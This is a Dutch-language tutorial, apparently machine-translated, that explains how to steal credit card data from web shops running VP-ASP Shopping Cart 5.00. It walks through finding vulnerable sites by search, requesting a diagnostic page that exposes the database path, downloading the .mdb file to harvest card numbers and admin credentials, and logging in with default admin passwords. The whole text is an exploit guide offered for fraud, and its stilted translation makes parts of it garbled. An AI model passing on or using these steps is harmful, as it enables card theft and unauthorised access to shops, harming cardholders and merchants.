Stap 3: Hoe HACK??
Creditcard hacken
Creditcards kunnen worden gehackt door twee manieren:
- Credit Card Scams (meestal gebruikt voor het verdienen van geld, soms om te winkelen)
- Credit Card winkel admin Hacking (gewoon voor de lol, kennis, winkelen op internet)
SHOP ADMIN methode van STELEN CREDIT CARD:
Laat start: zijn een zeer oude methode nauwelijks werk maar nog steeds een hoop op VP-ASP
Shopping Cart Version: 5,00
1. Ga naar google.com en type: VP-ASP Shopping Cart 5.002. U vindt veel van de websites met VP-ASP 5,00 kar installateur daarop
Nu laten we gaan naar de exploot...
De pagina zal worden als dit: ***://***.victim.com/shop/shopdisplaycategories.asp
Het exploit is: diag_dbtest.aspNow u nodig hebt om dit te doen: ***://***.victim.com/shop/diag_dbtest.asp
Een pagina verschijnt die bevatten:
• xDatabase
• shopping140
• xDblocation
• resx
• xdatabasetypexEmailxEmail NamexEmailSubjectxEmailSy stemxEmailTypexOrdernumbe
In het volgende voorbeeld:
Het belangrijkste hier is xDatabasexDatabase: shopping140Ok, nu de URL als dit worden zal: ***://***.victim.com/shop/shopping140.mdb
Als u de Database niet downloaden, probeer dit terwijl er dblocation:xDblocation is
resxthe
URL: ***://***.victim.com/shop/resx/shopping140.mdb
Download het mdb-bestand en u moet zitten kundig voor met een mdb-bestand viewer openen, u moet zitten kundig voor vinden op download.com of gebruik MS Office Access.Inside u moet zitten kundig voor vinden credit card informatie, en je zou zelfs kunnen vinden van de admin gebruikersnaam en het wachtwoord voor de website.
De admin loginpagina bevindt zich gewoonlijk hier: ***://***.victim.com/shop/shopadmin.asp
Als u de admin gebruikersnaam en het wachtwoord in het mdb-bestand kunt vinden of kunt, maar het is onjuist of u het mdb-bestand helemaal niet kunt vinden, probeer te vinden de admin loginpagina en vul de standaard wachtwoorden welke zijn: gebruikersnaam: adminpassword: adminORUsername: vpasppassword: vpasp